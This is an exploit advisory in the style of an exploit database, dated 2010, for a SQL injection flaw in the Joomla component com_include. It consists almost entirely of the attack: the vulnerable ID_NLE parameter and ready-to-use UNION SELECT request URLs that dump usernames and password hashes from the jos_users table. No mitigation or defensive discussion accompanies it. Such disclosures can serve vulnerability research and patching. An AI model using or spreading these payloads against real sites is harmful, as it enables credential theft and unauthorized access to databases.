Joomla Component com_include SQL Injection Vulnerability

2010-03-17
ID: 9706
CVE: None
Download vulnerable application: None
[~]#########################################   ExploiT   #############################################[~]
   [~] Vulnerable File :
   http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=[SQL]
   [~] ExploiT         :
   -1 UNION SELECT 1
   [~] Example         :
   http://127.0.0.1/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users
  [~] Demo            :
  http://server/index.php?option=com_include&lang=en_GB&Itemid=50&ID_NLE=-1 UNION SELECT concat(username,0x3a,password) FROM jos_users
1-4-2 (www02)